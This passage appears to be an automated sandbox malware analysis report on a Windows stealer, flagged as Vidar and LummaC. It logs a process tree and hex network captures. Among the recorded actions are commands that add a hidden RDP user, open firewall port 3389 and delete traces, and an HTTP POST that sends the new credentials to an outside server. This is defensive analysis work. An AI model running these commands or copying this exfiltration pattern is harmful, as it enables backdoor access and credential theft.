$Sjjt$Vxt!jt$$t$$t$$SVhSV
2024-09-26 23:50:34 UTC	16384	IN	Data Raw: f9 39 77 12 8d 1c 9b 46 8d 5b e8 8d 1c 59 0f be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89 Data Ascii: 9wF[Y0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!\|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB\|$-tDt$pV9"WfD$hL$lt$hT$5
2024-09-26 23:50:34 UTC	16384	IN	Data Raw: 4c 24 20 89 44 24 24 3b c2 7f 0c 7c 18 8b 44 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f Data Ascii: L$ D$$;\|D$;sD$D$ T$$"$D$k;l$$\|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP\|$4L$ l$8j\|$L$8QW@L$,9L$<\|
2024-09-26 23:50:34 UTC	16384	IN	Data Raw: 7c 24 10 be 07 00 00 00 eb 32 c7 40 08 01 00 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: \|$2@3@f@D$VF@:'\|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
2024-09-26 23:50:34 UTC	16384	IN	Data Raw: 10 83 c4 04 85 f6 74 64 8b 7c 24 14 e9 68 fe ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: td\|$hT$L$$l$ GT$GL$L$T$_^][_^]3[
2024-09-26 23:50:34 UTC	16384	IN	Data Raw: ff 83 c4 18 5f 5e 5d 5b 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 Data Ascii: _^][YVt$W\|$FVBhtw7t7Vg_^jjjh,g!t$
2024-09-26 23:50:34 UTC	16384	IN	Data Raw: 89 4a 2c ff 46 2c 5e c3 8b 4c 24 0c 33 d2 8b 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 Data Ascii: J,F,^L$3qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^\|$u\|$u_^3ARt$t$PA8tuL$
2024-09-26 23:50:35 UTC	16384	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW\|$mw<(6XvutT9 $tB8$tPh $VD $)$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.8	49765	188.114.96.3	443	1892	C:\ProgramData\JKEHIIJJEC.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:50:36 UTC	165	OUT	POST /receive.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: hansgborn.eu Content-Length: 58 Expect: 100-continue Connection: Keep-Alive
2024-09-26 23:50:36 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-26 23:50:36 UTC	58	OUT	Data Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 75 73 65 72 3d 52 44 50 55 73 65 72 5f 32 34 39 30 63 34 36 64 26 70 61 73 73 77 6f 72 64 3d 54 6f 4e 38 42 78 70 57 62 37 59 4a Data Ascii: ip=8.46.123.33&user=RDPUser_2490c46d&password=ToN8BxpWb7YJ
2024-09-26 23:50:36 UTC	605	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 23:50:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YUKXNSyZsEo%2FOcFyzJQcy09VFQrjvRQxYiLMJvgx34%2B%2BHehi1Z6XOOzNWC8kNt88Ei66XI4wUfux2yHWHPMysSX5uorfUoi6Myh7fRxPNcnGhrXVpnE3t%2B%2BNpQArcsM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c97283c9db1420d-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.8	49766	5.75.211.162	443	3040	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:50:37 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIECFIEGDBKJKFIDHIEC User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 829 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:50:37 UTC	829	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 36 63 30 38 62 34 34 39 32 62 36 36 31 64 37 39 64 65 32 38 39 33 64 62 37 30 34 66 39 35 33 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 0d 0a 43 6f 6e 74 Data Ascii: ------GIECFIEGDBKJKFIDHIECContent-Disposition: form-data; name="token"36c08b4492b661d79de2893db704f953------GIECFIEGDBKJKFIDHIECContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------GIECFIEGDBKJKFIDHIECCont
2024-09-26 23:50:38 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:50:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 23:50:38 UTC	15	IN	Data Raw: 35 0d 0a 62 6c 6f 63 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 5block0

Target ID:	0
Start time:	19:48:47
Start date:	26/09/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x640000
File size:	413'224 bytes
MD5 hash:	252A19A2FFC2AAEE5ED5D3F84BA30D38
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1436795595.0000000003AF5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.1436795595.0000000003AF5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	19:48:47
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	19:48:48
Start date:	26/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xad0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	19:49:48
Start date:	26/09/2024
Path:	C:\ProgramData\EBAAFCAFCB.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\EBAAFCAFCB.exe"
Imagebase:	0x940000
File size:	385'064 bytes
MD5 hash:	47697A60A96C5ADEF362D8DA9A274B7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000009.00000002.2052126229.0000000003CE5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 43%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	19:49:48
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	19:49:48
Start date:	26/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x1f0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	19:49:48
Start date:	26/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xea0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 0000000C.00000002.2162685267.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	19:49:50
Start date:	26/09/2024
Path:	C:\ProgramData\KECGDBFCBK.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\KECGDBFCBK.exe"
Imagebase:	0x5f0000
File size:	413'224 bytes
MD5 hash:	F73186DF5A030CF7F186B0737C3AF1F7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 42%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	19:49:50
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	19:49:51
Start date:	26/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x6e0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	19:49:52
Start date:	26/09/2024
Path:	C:\ProgramData\JKEHIIJJEC.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\JKEHIIJJEC.exe"
Imagebase:	0xa0000
File size:	73'728 bytes
MD5 hash:	3FCBAACCA9CC6DCCF0649F5ABB8B73EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000010.00000002.2514195438.0000000002481000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000010.00000000.2081801810.00000000000A2000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\ProgramData\JKEHIIJJEC.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	19:49:53
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /c net user
Imagebase:	0xa40000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	19:49:53
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	19:49:53
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	net user
Imagebase:	0x7ff7194a0000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	19:49:53
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 user
Imagebase:	0x2d0000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	19:49:55
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -i
Imagebase:	0xa40000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	19:49:55
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	19:49:55
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Local\Temp\RDPWInst.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\RDPWInst.exe -i
Imagebase:	0x400000
File size:	1'785'344 bytes
MD5 hash:	C213162C86BB943BCDF91B3DF381D2F6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000017.00000000.2112865515.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000017.00000002.2150209183.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Author: Joe Security Rule: JoeSecurity_RDPWrapTool, Description: Yara detected RDPWrap Tool, Source: 00000017.00000000.2112949311.0000000000450000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security Rule: JoeSecurity_RDPWrapTool, Description: Yara detected RDPWrap Tool, Source: 00000017.00000002.2150421257.0000000000450000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security Rule: JoeSecurity_RDPWrapTool, Description: Yara detected RDPWrap Tool, Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 47%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	19:49:56
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\EBAAFCAFCBKF" & exit
Imagebase:	0xa40000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	19:49:56
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	19:49:57
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 10
Imagebase:	0xe20000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	19:49:58
Start date:	26/09/2024
Path:	C:\Windows\System32\netsh.exe
Wow64 process (32bit):	false
Commandline:	netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
Imagebase:	0x7ff763130000
File size:	96'768 bytes
MD5 hash:	6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	19:49:59
Start date:	26/09/2024
Path:	C:\Windows\System32\drivers\rdpvideominiport.sys
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff6dbcd0000
File size:	32'600 bytes
MD5 hash:	77FF15B9237D62A5CBC6C80E5B20A492
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	31
Start time:	19:49:59
Start date:	26/09/2024
Path:	C:\Windows\System32\drivers\rdpdr.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size:	169'984 bytes
MD5 hash:	64991B36F0BD38026F7589572C98E3D6
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	35
Start time:	19:49:59
Start date:	26/09/2024
Path:	C:\Windows\System32\drivers\tsusbhub.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size:	137'728 bytes
MD5 hash:	CC6D4A26254EB72C93AC848ECFCFB4AF
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	37
Start time:	19:50:29
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /c net user RDPUser_2490c46d ToN8BxpWb7YJ /add
Imagebase:	0xa40000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	19:50:29
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	19:50:29
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	net user RDPUser_2490c46d ToN8BxpWb7YJ /add
Imagebase:	0xee0000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	19:50:30
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
